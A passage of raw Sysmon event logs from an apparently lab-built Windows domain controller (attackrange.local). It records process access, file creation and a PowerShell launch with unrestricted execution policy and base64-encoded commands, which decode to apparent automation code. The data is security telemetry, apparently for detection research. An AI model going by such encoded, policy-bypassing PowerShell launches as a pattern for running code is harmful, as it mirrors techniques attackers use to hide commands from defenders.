13:54:09.972{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.941{10ACEC4A-8581-5FCF-AE00-000000009101}47963728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF819009230) 154100x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.946{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABHAGUAdAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.723{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.723{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.723{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:09.691{10ACEC4A-8581-5FCF-B000-000000009101}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\nwrcnwgr.dll2020-12-08 13:54:09.582 10341000x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8581-5FCF-B100-000000009101}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.691{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C